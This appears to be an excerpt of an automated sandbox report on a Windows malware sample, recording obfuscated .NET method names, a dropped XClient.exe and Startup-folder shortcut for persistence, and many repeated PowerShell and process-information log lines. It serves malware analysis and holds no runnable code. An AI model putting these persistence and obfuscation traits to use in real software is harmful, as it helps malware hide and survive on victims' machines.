                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.csHigh entropy of concatenated method names: 'SktjeVQAgq2NUDDhVGQLtffzk7Y', 'CtarBZ1HEXsD94arDPmFsMJ2orj', 'Jcs0stg3beBOtmFfDweOixjz9og', 'R0jFEKXc0magkb27YqxkUPKU4Tl', '_6NXIBwQD7F8nGERUT3TACGB3lOD', 'M8zkVJKItRSoCrcC7cIdzcCNBy9', 'UWTjleB9asvuSQV44RqFkYDJIOj', 'LrphE5fJecFnffhZSGLqABZTJgQ', 'PpsBogNTjabWDCkxX8RGKVEjksp', 'LPmctabsUUhrVXgioj4pZW3enZ9'
                          Source: XClient.exe.0.dr, yg3VA3EFGZdbEMP0sB36o1rvwRb.csHigh entropy of concatenated method names: 'gRdj1vqOUhgpWhn8BStbuJZneww', 'nX35JTmmmDVkBUsZxHNuODxCpf0', 'X43RfMLXrrlVaETBhVNV824YuFp', 'u6L0fr0Yy3pOb1FCBzYomsvDG2X', 'C5RNlXWueLOy7wranJk75UDuXu2', 'KLeSBwFKMdsnmu6yzVHTtNc1dgA', 'YECDjSEvimvIyZ7yaWZIZK0mQnY', 'U4Y4IwVQS1gwVdtQKDGdQIKBlw0', 'YY7p4sCKKtzfVpLfTohfNjEBMM8', 'magkWLfQqTUoel7aG6sciHcBQ51'
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
